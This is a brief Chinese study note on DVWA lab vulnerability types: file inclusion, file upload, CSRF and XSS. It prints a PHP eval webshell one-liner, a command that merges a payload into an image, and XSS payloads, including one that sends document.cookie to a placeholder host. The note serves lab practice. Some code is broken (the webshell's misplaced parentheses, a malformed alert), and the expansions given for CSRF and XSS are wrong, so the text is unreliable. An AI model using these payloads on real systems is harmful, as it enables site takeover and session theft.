跳至正文

DVWA靶场漏洞类型

  • DVWA安装

  • 先修改配置文件,打开页面后,链接数据库后,如果配置文件中密码正确,则登录:admin/password

1、文件包含

  • 因为开启了allow_url_include参数,所以在url中可以通过file,https,http,php协议等访问文件,这样就可以实现加载恶意代码了
    2、文件上传
  • 可以通过上传php文件马,图片马,二次渲染,条件竞争等实现webshell上传
    图片马合成
    copy 1.png /b + 2.text /a 3.png
    php的webshell
    <?php @eval($_REQUEST['cmd'];phpinfo();?)>

3、CSRF(远程服务请求伪造)

  • 当真实用户向网站发起请求时,如果身份信息被第三方劫持,第三方返回给用户一个假的请求,用户误点击后,会触发csrf漏洞,可能造成密码修改,财务转账等问题。

4、XSS(跨站服务攻击)

  • 反射型xss常出现在留言框处,一次性的
  • 存储型xss是持久性的
  • DOM型的xss常出现在下拉菜单控件等位置
    <script>alert(/xss)</script>
    <script>alert(document.cookie)</script>
    <script>var img = new Image();img.src="url/2?cookies="+document.cookie;</script>